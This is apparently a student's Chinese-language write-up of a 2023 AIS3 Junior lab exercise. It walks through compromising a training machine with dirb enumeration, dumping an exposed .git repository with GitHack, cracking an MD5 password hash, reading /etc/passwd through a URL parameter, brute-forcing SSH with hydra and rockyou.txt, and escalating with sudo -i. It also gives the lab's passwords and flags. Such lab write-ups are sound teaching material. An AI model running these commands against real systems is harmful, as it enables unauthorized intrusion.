2023 AIS3 Junior writeup

2023 AIS3 Junior writeup

Thu Aug 17 2023
350 words · 2 minutes
  • 2023 AIS3 JUNIOR Homework

一、 作業內容與目標 打一號靶機,取得 Flag

二、步驟

  1. 先確認是否有連上網。 ping 10.17.1.9 image

  2. drib 該網站發現 backend 可以登入的地⽅。 dirb http://10.17.1.9:80

  3. 到 GitHack 資料夾,後用 GitHack 把網站抓下來。 cd GitHack python GitHack.py http://10.17.1.9/backend/.git/ image image

  4. cat index.php 後,發現 password,由於下面程式套用 if($username==’admin’~~~),故得知 admin 為 username。 image

  5. 將上圖反白處的亂碼製成 md5 檔,方可進行後續的爆破。
    cd echo 'eb0a191797624dd3a48fa681d3061212' > admin.md5 image

  6. 為後續爆破便利,欲將 wordlist 字典中的 rockyou.txt 檔案複製至上圖語 admin.md5 檔案同一資料夾內。 image

  7. 由於爆破未果,而用線上工具解決 password 亂碼。最終得出密碼是 master。 image image

  8. 登入成功後,將上方網址中的 hosts 更為 passwd,於下方反白處,發現 red 使用者名稱登入現象與眾不同。 image


image 9. 將 red 使用者名稱進行爆破1,密碼在下方綠字處,為 victor。 hydra -l red -P rockyou.txt -t 64 -I ssh://10.17.1.9 image 10. 欲使用 red 進行登入,輸入密碼後,如圖所示。 ssh red@10.17.1.9 image 11. 確認 red 的權限,為ALL sudo -i

  1. ls 後發現 local.txt,cat local.txt 之後,發現 flag 為 AIS3_Junior{YouAreBruteForcer:D:D:D:D:D} image

  2. 終了,然,非也。仍有 flag 尚未尋獲,變身為管理員身份後,發現還有一個 flag 為: AIS3\_Junior{First\_PenTestXDDDDDDD} image


Thanks for reading!

2023 AIS3 Junior writeup

Thu Aug 17 2023
350 words · 2 minutes